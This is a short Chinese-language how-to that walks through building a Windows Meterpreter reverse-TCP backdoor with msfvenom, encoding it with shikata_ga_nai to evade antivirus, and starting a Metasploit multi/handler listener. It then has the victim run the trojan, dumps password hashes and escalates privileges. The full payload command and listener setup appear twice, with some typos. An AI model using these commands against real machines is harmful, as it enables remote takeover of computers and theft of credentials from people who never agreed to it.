1.啟動msfconsole命令模式
2.msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.106 LPORT=1234 -f exe > ./test.exe
3.啟動msfconsole命令模式 use exploit/multi/handler 使用handler這個模塊,set PAYLOAD windows/meterpreter/reverse_tcp show options如果看到沒有熱河參數直接下一步(set LHOST=自己的ip set LPORT=端口),
然后
使用這個shellcode 然后show options 看到提示 LHOST LPORT 這里填生成木馬的自己的ip和端口 set LHOST 自己的ip 回車 然后set LPORT 端口
4.exploit 回車 然后等待目標點擊test.ext文件上線
1.執行以下命令:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.106 LPORT=1234 -f exe > ./test.exe
2.將test.exe復制到受害者主機上
3.在Kali中輸入msfconsole,並按照下圖進行配置:
4.執行exploit,然后在受害者主機上運行test.exe后門木馬,Metasploit接到反饋
session
得到meterpreter后,可以執行getuid、hashdump以及提權操作,還可以通過getgui命令拿受害主機的圖形界面。